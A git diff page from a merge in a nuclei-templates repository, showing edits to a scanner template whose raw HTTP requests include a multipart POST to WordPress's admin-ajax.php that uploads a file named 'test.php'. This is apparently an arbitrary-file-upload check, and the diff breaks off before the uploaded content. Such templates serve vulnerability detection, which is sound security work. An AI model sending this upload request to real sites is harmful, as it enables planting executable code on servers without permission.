Merge branch 'main' of https://github.com/E1A/nuclei-templates into pr/8118
commit
50ebcba392
|
@ -24,14 +24,17 @@ info:
|
|||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /?p=1 HTTP/1.1
|
||||
GET {{Path}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Accept: */*
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
------WebKitFormBoundaryBLOYSueQAdgN2PRe
|
||||
Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php"
|
||||
|
|
Loading…
Reference in New Issue